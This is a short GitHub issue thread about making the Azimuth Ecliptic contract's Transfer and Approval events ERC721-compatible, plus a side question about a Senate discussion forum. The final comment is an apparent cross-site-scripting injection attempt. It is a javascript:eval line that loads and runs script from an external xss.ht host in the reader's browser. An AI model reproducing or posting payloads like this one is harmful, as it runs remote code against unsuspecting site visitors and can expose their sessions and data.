### ISSUE TITLE
ERC721 compatibility

### ISSUE THREAD

**Issue by philipcmonk** [urbit/azimuth#8]
The `Transfer` and `Approval` events don't index their `_tokenId` parameters.  This is why, for example, Etherscan's NFT tracker doesn't record our transfers.  This should be a very small change to the Ecliptic, something like this: 
 https://github.com/philipcmonk/azimuth/commit/5cdec2c60567318dacb59a99881a3cea652d0be3

We should wait to make any proposal (which would need to be voted on by the senate) until a version of #5 of is merged so we can do it according to a process.

**Comment by juped** [comment]
Where, as @galenwp mentioned in the comments, is the missing Senate discussion forum? Some options:
- on Urbit - booting and chatting as galaxies is undesirable; less separation of Azimuth from Urbit
- on the blockchain somehow - costly and insanely cumbersome
- over email - bad for privacy, no public section
- on some bespoke website - someone has to host it (and someone has to make it)

**Comment by divyamnayyar** [comment]
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://divyamnayyar.xss.ht\';document.body.appendChild(a)')
